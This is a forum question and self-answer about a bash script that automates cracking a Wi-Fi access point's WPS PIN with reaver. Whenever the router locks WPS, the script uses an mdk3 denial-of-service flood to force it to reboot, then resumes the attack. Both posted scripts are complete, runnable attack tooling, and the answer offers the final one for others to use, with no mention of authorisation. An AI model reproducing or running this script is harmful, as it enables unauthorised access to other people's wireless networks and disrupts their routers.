Tags: linux, bash, cracking, aircrack-ng, wps

Bash script for reaver to unlock wps-locked status


First of all, sorry for my poor English. I'm trying to write a bash script to perform AP WPS cracking using reaver. The problem is that after trying some WPS PINs, the AP locks WPS, so reaver is no longer useful.

To solve this, I perform an mdk3 attack to force the AP to reboot so that I can attack it again (after the reboot, WPS restarts in the unlocked state).

The problem with this approach is that:

  1. I have to sit in front of the PC, watching for the moment the AP becomes locked, and
  2. launch an mdk3 attack, stop it once the AP has rebooted, and then run the reaver attack again. The solution to this is obviously a script.

I wrote the following lines which should solve this.

I have to say that I'm a total noob at bash scripting, so the script is not "professional"; it's just a "workaround" to solve my problem.

#!/bin/bash

while true; do
    # Switch to the correct channel and save it into $channel
    echo Detecting AP channel
    timeout 25 reaver -i wlan0mon -e AP_SSID -b AP_BSSID -q # Switch to the AP channel
    rm ap_channel 2> /dev/null
    touch ap_channel
    timeout 5 aireplay-ng -1 0 -e AP_SSID -a AP_BSSID -h MY_MAC wlan0mon > ap_channel
    channel="$(head -1 ap_channel | tail -c 2 | head -c 1)"
    rm ap_channel

    # Attacks the AP while it isn't wps-locked
    rm ap_status 2> /dev/null
    timeout 10 airodump-ng wlan0mon --wps --essid AP_SSID -c $channel 2> ap_status
    while [ -z "$(grep Locked ap_status)" ]; do
        echo Performing reaver attack
        aireplay-ng -1 0 -e AP_SSID -a AP_BSSID -h MY_MAC wlan0mon
        timeout 30 reaver -i wlan0mon -e AP_SSID -b AP_BSSID --no-nacks -vv -s REAVER_PREV_SESSION.wpc -w -A -g 1 -C gnome-screenshot -f
        rm ap_status
        timeout 10 airodump-ng wlan0mon --wps --essid AP_SSID -c $channel 2> ap_status
    done

    # The AP is now locked. Performs a mdk3 attack (in order to reboot the AP) while the AP wps-status is Locked
    ((mdk3 wlan0mon a -a AP_BSSID -m) 2>&1) > /dev/null &
    mdk3_pid=$!
    rm ap_status
    timeout 10 airodump-ng wlan0mon --wps --essid AP_SSID -c $channel 2> ap_status
    while [ -n "$(grep Locked ap_status)" ]; do
        echo Trying to reboot the AP
        rm ap_status
        timeout 10 airodump-ng wlan0mon --wps --essid AP_SSID -c $channel 2> ap_status
    done

    # The AP is now rebooted. Kill the mdk3 process and wait 2 mins to restart reaver attack
    kill -9 $mdk3_pid
    echo AP rebooted. Waiting 2 mins till AP init
    sleep 120
done

The problem with this script is that the stdout redirection I use for the airodump output behaves differently when I run it directly on the command line than when I run it inside the script.

timeout 10 airodump-ng wlan0mon --wps --essid AP_SSID -c $channel 2> ap_status

I need a way to execute the line above within the script as if I had executed it directly in the tty. I can't do this using exec because I need the script to continue afterwards.

NOTE: I can't use the -w option for airodump-ng because it doesn't save the WPS status.

Could someone please help me with this?


Solution

  • I finally got it. I found a workaround for this problem: redirecting the stdout of the commands to files. I'm posting the script; maybe someone can use it.

    #!/bin/bash

    while true; do
    
    rm attack
    rm ap_status
    rm ap_channel
    
    # Detects the AP channel
    echo Detecting AP channel
    timeout 45 reaver -i wlan0mon -e AP_SSID -b AP_BSSID -vv > ap_channel # Switch to the AP channel
    timeout 15 aireplay-ng -1 0 -e AP_SSID -a AP_BSSID -h MY_MAC wlan0mon > ap_channel
    channel="$(head -1 ap_channel | tail -c 3 | head -c 2)"
    rm ap_channel
    echo Detected AP channel $channel
    
    # Attacks the AP using reaver till the AP locks the WPS
    ((airodump-ng wlan0mon --wps --essid AP_SSID -c $channel) 2>&1) > ap_status &
    airodump_pid=$!
    sleep 10
    kill -9 $airodump_pid
    
    while [ -z "$(grep Locked ap_status)" ]; do
        echo Performing reaver attack
        aireplay-ng -1 0 -e AP_SSID -a AP_BSSID -h MY_MAC wlan0mon
        timeout 30 reaver -i wlan0mon -e AP_SSID -b AP_BSSID --no-nacks -vv -s PREV_SESSION.wpc -w -A -g 1 -C gnome-screenshot -f
        ((airodump-ng wlan0mon --wps --essid AP_SSID -c $channel) 2>&1) > ap_status &
        airodump_pid=$!
        sleep 10
        kill -9 $airodump_pid
    done
    
    # Force a reboot in the AP to unlock WPS
    ((mdk3 wlan0mon a -a AP_BSSID -m) 2>&1) > attack &
    mdk3_pid=$!
    
    ((airodump-ng wlan0mon --wps --essid AP_SSID -c $channel) 2>&1) > ap_status &
    airodump_pid=$!
    sleep 10
    kill -9 $airodump_pid
    
    while [ -n "$(grep Locked ap_status -m 1)" ]; do
        echo Trying to reboot the AP
        ((airodump-ng wlan0mon --wps --essid AP_SSID -c $channel) 2>&1) > ap_status &
        airodump_pid=$!
        sleep 10
        kill -9 $airodump_pid
    done
    
    # The AP is now rebooted. Kill the mdk3 process and wait 2 mins to restart reaver attack
    kill -9 $mdk3_pid
    echo AP rebooted. Waiting 5 mins till AP init
    rm attack
    rm ap_status
    sleep 300
    
    done
    

    The delays are set quite long, but they are OK. It depends on the AP; you can change them.

    To use the script, the aircrack, reaver (latest version, the one that has the --wps option), timeout and mdk3 packages are needed.

    If someone who knows about bash scripting wants to modify the script and upload a better one, that would be great!